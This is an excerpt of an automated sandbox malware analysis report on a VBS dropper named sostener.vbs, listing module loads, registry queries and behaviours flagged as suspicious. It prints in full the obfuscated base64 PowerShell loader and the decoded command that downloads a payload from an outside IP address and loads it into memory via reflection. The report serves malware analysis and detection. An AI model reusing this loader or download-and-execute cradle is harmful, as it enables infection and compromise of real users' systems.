                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: sostener.vbsStatic file information: File size 3462610 > 1048576

                  Data Obfuscation

                  barindex
                  Found suspicious powershell code related to unpacking or dynamic code loading
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;$global:?
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041BCE3
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFAAC491D9F pushfd ; ret 13_2_00007FFAAC491FAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004567E0 push eax; ret 15_2_004567FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0045B9DD push esi; ret 15_2_0045B9E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00455EAF push ecx; ret 15_2_00455EC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00433FF6 push ecx; ret 15_2_00434009
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00406128 ShellExecuteW,URLDownloadToFileW,15_2_00406128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_00419BC4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041BCE3
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
